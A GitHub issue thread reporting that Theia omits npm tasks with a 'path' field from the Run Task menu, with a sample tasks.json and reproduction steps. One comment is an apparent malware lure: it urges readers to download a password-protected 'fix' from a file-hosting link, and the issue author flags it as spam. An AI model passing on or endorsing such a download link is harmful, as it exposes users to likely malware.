### ISSUE TITLE
tasks.json with npm and path does not show label in run task

### ISSUE THREAD

**Issue by hsnoil** [eclipse-theia/theia#14073]
### Bug Description:

When you create a task in `tasks.json` that has `"type":"npm"` and a `"path":"."`, then do Terminal->Run Task... it won't show the label as an option

### Steps to Reproduce:

1.  `git clone https://github.com/microsoft/vscode-extension-samples.git`
2.  Load up `helloworld-sample` in Theia
3. Edit the `tasks.json` with the following:

```json
// See https://go.microsoft.com/fwlink/?LinkId=733558
// for the documentation about the tasks.json format
{
	"version": "2.0.0",
	"tasks": [
		{
			"type": "npm",
			"label":"THIS WON'T SHOW",
			"script": "compile",
			"problemMatcher": "$tsc",
			"group": "build",
                       "path": "."
		},
		{
			"type": "npm",
			"label":"THIS WILL SHOW",
			"script": "compile",
			"problemMatcher": "$tsc",
			"group": "build"
		}
	]
}
```
4. Terminal->Run Task...

As you can see `THIS WON'T SHOW` does not show, while `THIS WILL SHOW` that has no path does show.

vscode has no problems with either. Though Theia seems to do an extra check to see if the entry exists in package.json which vscode does not. But the check doesn't seem to work with `path`

### Additional Information

- Operating System: Linux
- Theia Version: 1.52.0

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by hsnoil** [comment]
> to fix your trouble try download this fix, i see it in another issue

spam?

**Comment by tsmaeder** [comment]
Looks like a dup of https://github.com/eclipse-theia/theia/issues/7684
